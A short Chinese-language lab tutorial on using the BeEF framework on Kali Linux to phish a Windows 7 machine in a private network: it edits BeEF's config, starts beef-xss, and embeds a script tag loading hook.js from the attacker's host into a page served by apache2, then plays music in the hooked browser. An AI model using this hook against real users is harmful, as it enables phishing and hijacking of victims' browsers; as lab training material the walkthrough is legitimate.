Kali之Beef利用Xss进行钓鱼

1、操作准备

攻击机：Kali（ip地址：192.168.1.107）
受害者：Windows7 x64（ip地址：192.168.1.163）

2、配置Beef

进入beef的配置文件里

aaa@qq.com:~# vim /etc/beef-xss/config.yaml

在这里可以看到beef的默认用户名和密码，也可以进行修改，我这里对默认的密码进行了修改
注：（默认beef用户名和密码位User：beef，Password：beef）

3、启动Beef

aaa@qq.com:~# beef-xss

输入账号密码进行登录

4、配置apache2

1.进入apache2的目录下将自己制作好的网页替换掉默认的index.html
2.将<script src="http://192.168.1.107:3000/hook.js"></script>挂到自己制作好的网页中
3.启动apache2

aaa@qq.com:~# /etc/init.d/apache2 start

5、进行钓鱼

1.Windows7访问该网页
2.在kali上可以看到，受害者已经上线了

3.进行攻击
案例（这里通过beef给受害者发送一段音乐）

在受害者的浏览器上可以看到音乐已经被播放

warning ：未经授权，不得转载
本文所介绍技术仅供参考学习，切勿恶意用途